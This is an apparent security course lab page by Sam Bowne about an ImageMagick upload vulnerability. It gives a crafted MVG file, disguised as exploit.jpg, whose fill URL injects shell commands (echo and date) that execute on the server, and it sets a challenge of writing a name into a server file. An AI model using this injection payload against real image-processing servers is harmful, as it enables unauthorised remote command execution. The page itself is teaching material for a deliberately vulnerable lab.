Vulnerable ImageMagick Page

Normal Usage

  1. Get a normal GIF or JPEG image
  2. Upload it using the buttons below
  3. Click the thumbnail to see your image
Select image to upload:


Make a text file with these contents:

push graphic-context
viewbox 0 0 640 480
fill 'url("|echo "HELLO";date;")'
pop graphic-context
Save it as exploit.jpg. Upload it using the form above on this page.

The "echo" and "date" commands execute, as shown below.

Challenge: Add Your Name to the Hall of Fame

Put your name in this file:

After one minute, your name will appear on the WINNERS page here:


Step-by-step instructions


Posted 5-4-16 by Sam Bowne
Revised 2-15-17